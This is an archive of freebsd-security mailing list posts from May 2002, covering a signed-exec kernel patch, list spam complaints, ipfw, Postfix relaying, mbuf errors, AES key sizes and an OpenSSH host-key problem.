X-Loop: FreeBSD.org * Michael A. Williams [020505 22:09] wrote: > Hi, > > Updated kernel option signed_exec patches for FreeBSD 5.0 DP1 Developer > Preview One are available from: > > http://www.trojanproof.org/sigexec-fbsd5.0dp1-0.1.tgz > > These patches have been tested against 5.0 DP1 For the completely lazy amongst us, can you please provide a url that _explains_ what these patches do? :) -Alfred To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 22:38:15 2002 Delivered-To: freebsd-security@freebsd.org Received: from smtp.sambolian.net.nz (203-79-83-205.cable.paradise.net.nz [203.79.83.205]) by hub.freebsd.org (Postfix) with ESMTP id B51FA37B405 for ; Sun, 5 May 2002 22:38:11 -0700 (PDT) Received: by smtp.sambolian.net.nz (Postfix, from userid 80) id 5C0DB10A39; Mon, 6 May 2002 17:39:25 +1200 (NZST) Received: from 192.168.0.1 ( [192.168.0.1]) as user andy@imap.sambolian.net.nz by webmail.sambolian.net.nz with HTTP; Mon, 6 May 2002 17:39:25 +1200 Message-ID: <1020663565.3cd6170d34fc7@webmail.sambolian.net.nz> Date: Mon, 6 May 2002 17:39:25 +1200 From: andy@sambolian.net.nz To: freebsd-security@FreeBSD.ORG Subject: Re: Updated Anti-Trojan kernel patches for FreeBSD 5.0 DP1 References: <3CD6100D.1BC0890@netxsecure.net> <20020506051720.GA36741@elvis.mu.org> In-Reply-To: <20020506051720.GA36741@elvis.mu.org> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit User-Agent: Internet Messaging Program (IMP) 3.0 X-Originating-IP: 192.168.0.1 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org I think this is what you are after. http://www.trojanproof.org/sigexec.pdf Andrew Quoting Alfred Perlstein : > * Michael A. Williams [020505 22:09] wrote: > > Hi, > > > > Updated kernel option signed_exec patches for FreeBSD 5.0 DP1 Developer > > Preview One are available from: > > > > http://www.trojanproof.org/sigexec-fbsd5.0dp1-0.1.tgz > > > > These patches have been tested against 5.0 DP1 > > For the completely lazy amongst us, can you please provide a url > that _explains_ what these patches do? :) > > -Alfred > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > > ------------------------------------------------- This mail sent through IMP: http://horde.org/imp/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun May 5 23:32:13 2002 Delivered-To: freebsd-security@freebsd.org Received: from mta3-rme.xtra.co.nz (mta3-rme.xtra.co.nz [210.86.15.131]) by hub.freebsd.org (Postfix) with ESMTP id 680F337B404 for ; Sun, 5 May 2002 23:32:09 -0700 (PDT) Received: from netxsecure.net ([210.55.243.112]) by mta3-rme.xtra.co.nz with ESMTP id <20020506063207.BVII7031.mta3-rme.xtra.co.nz@netxsecure.net>; Mon, 6 May 2002 18:32:07 +1200 Message-ID: <3CD62388.C52BC087@netxsecure.net> Date: Mon, 06 May 2002 18:32:40 +1200 From: "Michael A. Williams" Reply-To: mike@netxsecure.net X-Mailer: Mozilla 4.76 [en] (X11; U; FreeBSD 4.4-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: andy@sambolian.net.nz Cc: freebsd-security@FreeBSD.ORG Subject: Re: Updated Anti-Trojan kernel patches for FreeBSD 5.0 DP1 References: <3CD6100D.1BC0890@netxsecure.net> <20020506051720.GA36741@elvis.mu.org> <1020663565.3cd6170d34fc7@webmail.sambolian.net.nz> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Correct, thanks Andrew. BTW without an available SMP for testing I am not convinced that this will behave correctly in an SMP kernel and am almost certain that it will not make good use of SMP. But that is getting away from security. Cheers, Mike. andy@sambolian.net.nz wrote: > > I think this is what you are after. > > http://www.trojanproof.org/sigexec.pdf ... > Quoting Alfred Perlstein : ... > > > Updated kernel option signed_exec patches for FreeBSD 5.0 DP1 Developer > > > Preview One are available from: ... > > For the completely lazy amongst us, can you please provide a url > > that _explains_ what these patches do? :) > > > > -Alfred -- Michael A. Williams Security Software Engineering and InfoSec Manager NetXSecure NZ Limited, http://www.nxs.co.nz Ph: +64.3.318.2973 Fax: +64.3.318.2975 Mob: +64.21.995.914 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 2:41:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from storm.FreeBSD.org.uk (storm.FreeBSD.org.uk [194.242.139.170]) by hub.freebsd.org (Postfix) with ESMTP id F3BB737B40A for ; Mon, 6 May 2002 02:41:14 -0700 (PDT) Received: from storm.FreeBSD.org.uk (uucp@localhost [127.0.0.1]) by storm.FreeBSD.org.uk (8.12.2/8.12.2) with ESMTP id g469fDVD033411 for ; Mon, 6 May 2002 10:41:13 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Received: (from uucp@localhost) by storm.FreeBSD.org.uk (8.12.2/8.12.2/Submit) with UUCP id g469fDRA033410 for security@FreeBSD.ORG; Mon, 6 May 2002 10:41:13 +0100 (BST) Received: from grimreaper.grondar.org (localhost [127.0.0.1]) by grimreaper.grondar.org (8.12.3/8.12.3) with ESMTP id g469dQoI035632 for ; Mon, 6 May 2002 10:39:26 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Message-Id: <200205060939.g469dQoI035632@grimreaper.grondar.org> To: security@FreeBSD.ORG Subject: Re: Please stop trying to unsubscribe (Was: Re: You've Been Removed!) References: <20020505153746.C35748@malkavian.org> In-Reply-To: <20020505153746.C35748@malkavian.org> ; from "brian j. peterson" "Sun, 05 May 2002 15:37:46 PDT." Date: Mon, 06 May 2002 10:39:26 +0100 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > it'd be nice if people simply stopped loading the unsubscribe link... > since it is also the resubscribe link. every other person trying to > unsubscribe security@freebsd.org from the list has been actually > resubscribing... generating more email... leading to another attempt > to unsubscribe... generating more email... ad nauseum. Anyone who unsubscribes from spam is deluding themselves. It is verifiable in very many cases that the unsubscribe route is used for no more than verifying "live" email addresses for higher-priced resale. For that reason, unsubscribing mailing lists that you do not own is much worse. Can we kill this thread-from-hell now and take it to a spam-discussion list, _please_? M -- o Mark Murray \_ O.\_ Warning: this .sig is umop ap!sdn To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 2:45: 7 2002 Delivered-To: freebsd-security@freebsd.org Received: from noname.csdl.lt (noname.csdl.lt [194.176.40.182]) by hub.freebsd.org (Postfix) with SMTP id E10D437B405 for ; Mon, 6 May 2002 02:44:58 -0700 (PDT) Received: (qmail 9959 invoked by uid 1000); 6 May 2002 09:44:56 -0000 Date: Mon, 6 May 2002 11:44:55 +0200 From: Paulius Bulotas To: security@freebsd.org Subject: Re: ipfw Message-ID: <20020506094455.GA9926@kaktusas.org> Mail-Followup-To: security@freebsd.org References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable In-Reply-To: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, On 02 05 04, William J. Borskey wrote: > is it possible to write rules for ipfw using ethernet addresses instead o= f=20 > ip addresses? http://www.bsdshell.net/hut_ethfw.html Paulius To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 3:11:42 2002 Delivered-To: freebsd-security@freebsd.org Received: from storm.FreeBSD.org.uk (storm.FreeBSD.org.uk [194.242.139.170]) by hub.freebsd.org (Postfix) with ESMTP id ACEF537B406 for ; Mon, 6 May 2002 03:11:36 -0700 (PDT) Received: from storm.FreeBSD.org.uk (uucp@localhost [127.0.0.1]) by storm.FreeBSD.org.uk (8.12.2/8.12.2) with ESMTP id g46ABOVD039278; Mon, 6 May 2002 11:11:24 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Received: (from uucp@localhost) by storm.FreeBSD.org.uk (8.12.2/8.12.2/Submit) with UUCP id g46ABNlh039277; Mon, 6 May 2002 11:11:23 +0100 (BST) Received: from grimreaper.grondar.org (localhost [127.0.0.1]) by grimreaper.grondar.org (8.12.3/8.12.3) with ESMTP id g46AACoI036004; Mon, 6 May 2002 11:10:12 +0100 (BST) (envelope-from mark@grimreaper.grondar.org) Message-Id: <200205061010.g46AACoI036004@grimreaper.grondar.org> To: Matthew Dillon Cc: security@FreeBSD.ORG Subject: Re: You've Been Removed! References: <200205060013.g460DYn54044@apollo.backplane.com> In-Reply-To: <200205060013.g460DYn54044@apollo.backplane.com> ; from Matthew Dillon "Sun, 05 May 2002 17:13:34 PDT." Date: Mon, 06 May 2002 11:10:12 +0100 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org > I think the lists should remain open. A perfect solution would be > to have the mail system keep a database of originators (From: and > the first Received: header). Whenever it sees an email from someone > not in the database it would request that the person acknowledge > that they really intended to send the email and, if they do, their > email goes through and they are added to the database (so it only > asks them once). How does that differ from subscription+autodeleting-list-content? > I've been contemplating writing such a beast for myself, since 90% > of the email I receive these days is spam. I'm sure others have > written similar things so I'm wondering if there is a solution out > there already. At some point I'm going to write mine (as a standalone > MX relay so it could be tied into any system), when I have more time > available. Existing mailing list managers can already do this. It effectively makes it easy to join the list, but not receive the list contents. M -- o Mark Murray \_ O.\_ Warning: this .sig is umop ap!sdn #text/plain; name=cv.doc [Mark Murray CV Plain Text] cv.doc #application/octet-stream; name=cv.pdf [Mark Murray CV PDF] cv.pdf To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 5:35:35 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (f98.pav2.hotmail.com [64.4.37.98]) by hub.freebsd.org (Postfix) with ESMTP id DC6A537B404 for ; Mon, 6 May 2002 05:35:32 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 6 May 2002 05:35:32 -0700 Received: from 202.41.224.36 by pv2fd.pav2.hotmail.msn.com with HTTP; Mon, 06 May 2002 12:35:32 GMT X-Originating-IP: [202.41.224.36] From: "Sunil Sunder Raj" To: security@freebsd.org Subject: Postfix smtp relay server Date: Mon, 06 May 2002 18:05:32 +0530 Mime-Version: 1.0 Content-Type: text/plain; format=flowed Message-ID: X-OriginalArrivalTime: 06 May 2002 12:35:32.0673 (UTC) FILETIME=[83683310:01C1F4FA] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I have setup postfix on a freebsd 5 server say A. I have virtually hosted some domains on another server say B. I want to use this server as an SMTP RELAY SERVER. FOR EG. I have abcd.com hosted on server B I want anything@abcd.com to use server A as an smtp relay server. that is anything@abcd.com should be able to send mails to any server in the world via the SMTP SERVER A. Could some one give me the steps involved. I am a bit confused. THANKS IN ANVANCE. _________________________________________________________________ Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 5:57: 5 2002 Delivered-To: freebsd-security@freebsd.org Received: from mgw1-out.MEIway.com (mgw1.meiway.com [212.73.210.75]) by hub.freebsd.org (Postfix) with ESMTP id B28C437B404 for ; Mon, 6 May 2002 05:57:01 -0700 (PDT) Received: from VirusGate.MEIway.com (virus-gate.meiway.com [212.73.210.91]) by mgw1-out.MEIway.com (Postfix Relay Hub) with ESMTP id 3559338BA9 for ; Mon, 6 May 2002 14:57:00 +0200 (CEST) Received: from localhost (localhost.MEIway.com [127.0.0.1]) by VirusGate.MEIway.com (Postfix) with ESMTP id CA25C5B125 for ; Mon, 6 May 2002 15:09:01 +0200 (CEST) Received: from mail.Go2France.com (ms1.meiway.com [212.73.210.73]) by VirusGate.MEIway.com (Postfix) with ESMTP id 9054E5B124 for ; Mon, 6 May 2002 15:08:59 +0200 (CEST) Received: from LenConrad.Go2France.com [207.224.58.33] by mail.Go2France.com with ESMTP (SMTPD32-6.06) id A322E26022A; Mon, 06 May 2002 15:20:34 +0200 Message-Id: <5.1.0.14.2.20020506075618.038110e8@mail.Go2France.com> X-Sender: LConrad@Go2France.com@mail.Go2France.com X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Mon, 06 May 2002 07:56:52 -0500 To: freebsd-security@freebsd.org From: Len Conrad Subject: Re: Postfix smtp relay server In-Reply-To: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed X-Virus-Scanned: by VirusGate.MEIway.com Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org >I want anything@abcd.com to use server A as an smtp relay server. >that is anything@abcd.com should be able to send mails to any server in >the world via the SMTP SERVER A. >Could some one give me the steps involved. >I am a bit confused. see IMGate site in my sig. Len www.menandmice.com/DNS-training : DNS Training BIND8NT.MEIway.com : ISC BIND for NT4 & W2K IMGate.MEIway.com : Build free, hi-perf, anti-abuse mail gateways To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 5:57:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from morgoth.sl.pt (isengard.sl.pt [212.55.140.11]) by hub.freebsd.org (Postfix) with SMTP id 1BF0137B400 for ; Mon, 6 May 2002 05:57:14 -0700 (PDT) Received: (qmail 5085 invoked by uid 500); 6 May 2002 12:53:45 -0000 Date: Mon, 6 May 2002 13:53:45 +0100 From: Jose Celestino To: security@freebsd.org Subject: Re: You've Been Added! Message-ID: <20020506125345.GC4963@co.sapo.pt> Mail-Followup-To: security@freebsd.org References: <200205051816.OAA29057@matterhorn.pinn.net> Mime-Version: 1.0 Content-Type: multipart/signed; micalg=pgp-sha1; protocol="application/pgp-signature"; boundary="PNTmBPCT7hxwcZjr" Content-Disposition: inline In-Reply-To: <200205051816.OAA29057@matterhorn.pinn.net> User-Agent: Mutt/1.3.28i X-GPG-key-ID/Fingerprint: 0x07B1363B / D3F3 B47B F20C 3B1E 488C B949 1B8B 8141 07B1 363B X-URL: http://xpto.org/~japc X-System: Linux morgoth.sl.pt 2.4.18-pre9 i686 X-By: japc@morgoth.sl.pt X-Location: Ericeira, Portugal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org --PNTmBPCT7hxwcZjr Content-Type: text/plain; charset=us-ascii Content-Disposition: inline Content-Transfer-Encoding: quoted-printable Ok, I must say this is annoying. Is the list admin awake? Words by Kane Marie Fine Arts Gallery [Sun, May 05, 2002 at 02:16:11PM -040= 0]: > This message is to confirm the addition of your > email address: security@freebsd.org to the=20 > Kane Marie Fine Arts Gallery > Subscribe Me mailing list. >=20 > If you feel you have received this notice in error, > please visit the Kane Marie Fine Arts Gallery > Subscribe Me mailing list > at our website:=20 >=20 > http://www.kanemarie.com > to remove yourself automatically, or click the link below: >=20 > http://www.kanemarie.com/cgi-bin/bulkmail/s.pl?r=3D1&l=3D1&e=3Dsecurity= =3D:freebsd.org >=20 > Thank you, >=20 > Kane Marie Fine Arts Gallery --=20 Jose Celestino SAPO.pt::Systems http://www.sapo.pt --------------------------------------------------------------------- Titanic 1912 / Hindenburg Zeppelin 1937 / Microsoft Windows 2000 Linux morgoth.sl.pt 2.4.18-pre9 #5 Wed Feb 20 23:47:45 WET 2002 i686 unknown --PNTmBPCT7hxwcZjr Content-Type: application/pgp-signature Content-Disposition: inline -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE81nzYG4uBQQexNjsRApcbAKDvKFs+A9dnhBOXRdUMIahG3lgUlgCcC8Zk IYohfZX17U202khhNY8qudk= =Bw9L -----END PGP SIGNATURE----- --PNTmBPCT7hxwcZjr-- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 6:44:24 2002 Delivered-To: freebsd-security@freebsd.org Received: from crimelords.org (crimelords.org [199.233.213.8]) by hub.freebsd.org (Postfix) with ESMTP id 7B20C37B412 for ; Mon, 6 May 2002 06:43:41 -0700 (PDT) Received: from localhost (admin@localhost) by crimelords.org (8.11.6/8.11.6) with ESMTP id g46DdpJ91691 for ; Mon, 6 May 2002 08:39:53 -0500 (CDT) (envelope-from admin@crimelords.org) Date: Mon, 6 May 2002 08:39:51 -0500 (CDT) From: admin To: freebsd-security@freebsd.org Subject: 4.5 stable & tcpip fix maybe? Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Did any of the last src upgrades make a change that might cause me to get this error... May 5 13:52:05 xXx /kernel: m_retry failed, consider increase mbuf value May 5 13:52:05 xXx /kernel: m_retryhdr failed, consider increase mbuf value May 5 13:52:36 xXx last message repeated 29 times May 5 13:54:37 xXx last message repeated 111 times May 5 13:55:11 xXx last message repeated 31 times I'm guessing I'm just getting DoS'd, but was wondering if this was maybe related to FreeBSD-SA-03:21.tcpip which allowed the remote attacker to exploit the routing table and take up memory thus freezing the system. I ask because I had an uptime over 200+ days and never got these msg's on the last kernel and now I see them quite frequent and don't know where else they could come from. I appear to stay stable and have not been dropped from these errors, but they are rather large and re-occurring. -emacs To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 7:30: 9 2002 Delivered-To: freebsd-security@freebsd.org Received: from hotmail.com (oe64.pav1.hotmail.com [64.4.30.199]) by hub.freebsd.org (Postfix) with ESMTP id 0DBE337B403 for ; Mon, 6 May 2002 07:30:02 -0700 (PDT) Received: from mail pickup service by hotmail.com with Microsoft SMTPSVC; Mon, 6 May 2002 07:30:01 -0700 X-Originating-IP: [207.112.2.1] From: "jack xiao" To: Subject: AES(rijndael) Date: Mon, 6 May 2002 10:26:47 -0400 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Message-ID: X-OriginalArrivalTime: 06 May 2002 14:30:01.0642 (UTC) FILETIME=[81A1B0A0:01C1F50A] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi All, I have some questions about AES(rijndael) algorithm. AS far as I know, The AES algorithm is capable of using cryptographic keys of 128, 192, and 256 bits to encypt and decrypt data in blocks of 128 bits. So I did the following test. I chose DES, 3DES and Blowfish in the Key Encryption and AES in Data Encryption in isakmpd.conf under FreeBSD4.5. The DES key is 64 bits, key of 3DES is 192 bits and Blowfish key varies from 32 bits to 448 bits. Before the test, I guess I can set up the tunnel with 128, 192 or 256 bits key. But to my surprise, I can set up the tunnel with 64 bits key(DES), 448 bits key(Blowfish) besides 128, 192 and 256 bits key. Everytime, when I use "setkey -Dv" to show the key after the tunnel is up, the encypt and decrypt data is in blocks of 128 bits. Is that to say, AES is capable using more kinds of keys than 128, 192, 256 bits long? Could you please give me your thoughts? Thanks. Jack To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 8: 4: 3 2002 Delivered-To: freebsd-security@freebsd.org Received: from fritz.cc.gt.atl.ga.us (fritz.cc.gt.atl.ga.us [199.77.128.120]) by hub.freebsd.org (Postfix) with ESMTP id C436937B406 for ; Mon, 6 May 2002 08:03:52 -0700 (PDT) Received: from fritz.cc.gt.atl.ga.us (localhost.cc.gt.atl.ga.us [127.0.0.1]) by fritz.cc.gt.atl.ga.us (8.12.3/8.12.3) with ESMTP id g46F6FeX090315; Mon, 6 May 2002 11:06:15 -0400 (EDT) (envelope-from dagon@fritz.cc.gt.atl.ga.us) Received: (from dagon@localhost) by fritz.cc.gt.atl.ga.us (8.12.3/8.12.3/Submit) id g46F6E8n090314; Mon, 6 May 2002 11:06:14 -0400 (EDT) Date: Mon, 6 May 2002 11:06:14 -0400 From: David Dagon To: jack xiao Cc: freebsd-security@FreeBSD.ORG Subject: Re: AES(rijndael) Message-ID: <20020506110614.B90233@fritz.cc.gt.atl.ga.us> References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5.1i In-Reply-To: ; from jack_xiao99@hotmail.com on Mon, May 06, 2002 at 10:26:47AM -0400 X-Echelon: RSA Crypto C4 Mossad CIA BXA Export Control Hello to all the fans of the US Patriot Act Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Mon, May 06, 2002 at 10:26:47AM -0400, jack xiao wrote: > I have some questions about AES(rijndael) algorithm. AS far as I know, The > AES algorithm is capable of using cryptographic keys of 128, 192, and 256 > bits to encypt and decrypt data in blocks of 128 bits. This is correct. With 128 bit keys, there are ~3.4 x 10^38 keys, with 192 bits, there are ~6.2 x 10^57 keys, and 256 bits yields ~1.1 x 10^77. You can examine a reference implementation from the authors at: http://csrc.nist.gov/encryption/aes/rijndael/rijndael-unix-refc.tar and also: /usr/src/sys/crypto/rijndael > Is that to say, AES is capable using more kinds of keys than 128, > 192, 256 bits long? Could you please give me your thoughts? FYI, DES uses a 64 bit input as a key but only 56 bits are used for the actual key itself. (The other bits are 'parity', or were discarded in the standard to weaken DES, depending on your perspective.) Most modern systems also add salt to increase the strength of DES. Freebsd has des_cipher(3) that accepts up to 24 bits of salt for ~16M variations on simple DES. The FIPS 197 standard for AES lists only 128, 192, 256 bit key sizes. While it may be possible to write a program that takes larger keys, one would have to first investigate whether the larger keys would yield expansions/shifts that create congruences, or would then be vulnerable to weak keys, etc. -- David Dagon /"\ "When cryptography dagon@cc.gatech.edu \ / ASCII RIBBON CAMPAIGN is outlawed, bayl Georgia Inst. of Tech. X AGAINST HTML MAIL bhgynjf jvyy unir / \ cevinpl." To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 8:53: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mailhub.isternet.sk (smtp.isternet.sk [195.72.0.60]) by hub.freebsd.org (Postfix) with ESMTP id 3843C37B407 for ; Mon, 6 May 2002 08:52:56 -0700 (PDT) Received: from localhost (localhost [127.0.0.1]) by mailhub.isternet.sk (Postfix) with ESMTP id 914D33CC for ; Mon, 6 May 2002 17:57:28 +0200 (CEST) Received: from branoold (urpin.isternet.sk [195.72.0.1]) by mailhub.isternet.sk (Postfix) with SMTP id 004D43BC for ; Mon, 6 May 2002 17:57:26 +0200 (CEST) Message-ID: <02d301c1f516$63cab840$c28c630a@bb.ubp.sk> From: "[brano]" To: References: Subject: openssh problem Date: Mon, 6 May 2002 17:54:58 +0200 X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 X-Virus-Scanned: by AMaViS snapshot-20010714 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I have FreeBSD 4.5-RELEASE I downloaded newest ports and install openssh (version 3.1) When I generate new keys for openssh with 4096 bits, I can't connect to server (if I generate keys with 2048 bits, it's working good) I modified /etc/rc.network case ${sshd_enable} in [Yy][Ee][Ss]) if [ ! -f /etc/ssh/ssh_host_key ]; then echo ' creating ssh RSA host key'; /usr/bin/ssh-keygen -t rsa1 -b 4096 -N "" -f /etc/ssh/ssh_host_key fi if [ ! -f /etc/ssh/ssh_host_dsa_key ]; then echo ' creating ssh DSA host key'; /usr/bin/ssh-keygen -d -b 4096 -N "" -f /etc/ssh/ssh_host_dsa_key fi if [ ! -f /etc/ssh/ssh_host_rsa_key ]; then echo ' creating ssh RSA host key'; /usr/bin/ssh-keygen -t rsa -b 4096 -N "" -f /etc/ssh/ssh_host_rsa_key fi ;; esac I modified /etc/ssh/sshd_config remove support for ssh1 and allow only ssh2 when I use SecureCRT 3.4.3 or PenguinNet 1.21, I found this error in /var/log/authlog May 6 16:31:26 temne sshd[259]: Received disconnect from xxx.xxx.xxx.xxx: 9: Corrupt or nonexistent host key or al gorithm.^M I use normal username and password via keyboard, any keys or other authentication methods. Have anyone some idea why it doesn't work ? Thanks Brano from Slovakia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 8:59:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from laptop.tenebras.com (laptop.tenebras.com [66.92.188.18]) by hub.freebsd.org (Postfix) with SMTP id 14D4737B408 for ; Mon, 6 May 2002 08:59:24 -0700 (PDT) Received: (qmail 34077 invoked from network); 6 May 2002 15:59:23 -0000 Received: from sapphire.tenebras.com (HELO tenebras.com) (66.92.188.241) by 0 with SMTP; 6 May 2002 15:59:23 -0000 Message-ID: <3CD6A85A.4050009@tenebras.com> Date: Mon, 06 May 2002 08:59:22 -0700 From: Michael Sierchio Reply-To: kudzu@tenebras.com User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.0rc1) Gecko/20020427 X-Accept-Language: en-us, en MIME-Version: 1.0 To: Matthew Dillon Cc: Nils Holland , Colin Faber , security@FreeBSD.ORG Subject: Re: You've Been Removed! References: <200205051832.OAA29652@matterhorn.pinn.net> <3CD59C0A.306681E3@fpsn.net> <20020505233756.A8532@daemon.tisys.org> <200205060013.g460DYn54044@apollo.backplane.com> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Matthew Dillon wrote: > I think the lists should remain open. A perfect solution would be > to have the mail system keep a database of originators (From: and > the first Received: header). Whenever it sees an email from someone > not in the database it would request that the person acknowledge > that they really intended to send the email and, if they do, their > email goes through and they are added to the database (so it only > asks them once). > > I've been contemplating writing such a beast for myself, since 90% > of the email I receive these days is spam. I'm sure others have > written similar things so I'm wondering if there is a solution out > there already. At some point I'm going to write mine (as a standalone > MX relay so it could be tied into any system), when I have more time > available. Matt - Such a beast exists. I'm running qmail here, w/tcprules, and get about 1 or 2 SPAM a day. The qsecretary function of exmlm does what you describe -- it may be configured to require confirmation of every message sent to the list, or just the first from a given envelope sender, etc. It takes some effort to adopt the Daniel J. Bernstein mindset, but I'm a happy customer, and would be more than happy to assist in setting this up. The packages required are: daemontools-0.76_2 ezmlm-idx-0.40_1 qmail-1.03_1 ucspi-tcp-0.88 Cheezwhiz, Michael To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 11: 2:18 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2AC5037B40C for ; Mon, 6 May 2002 11:02:16 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g46I2GG91600 for security@freebsd.org; Mon, 6 May 2002 11:02:16 -0700 (PDT) (envelope-from owner-bugmaster@freebsd.org) Date: Mon, 6 May 2002 11:02:16 -0700 (PDT) Message-Id: <200205061802.g46I2GG91600@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: peter set sender to owner-bugmaster@freebsd.org using -f From: FreeBSD bugmaster To: security@FreeBSD.org Subject: Current problem reports assigned to you Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon May 6 11:23:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.FreeBSD.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id A3FE637B400 for ; Mon, 6 May 2002 11:23:39 -0700 (PDT) Received: (from peter@localhost) by freefall.freebsd.org (8.11.6/8.11.6) id g46INcU98140 for security@freebsd.org; Mon, 6 May 2002 11:23:38 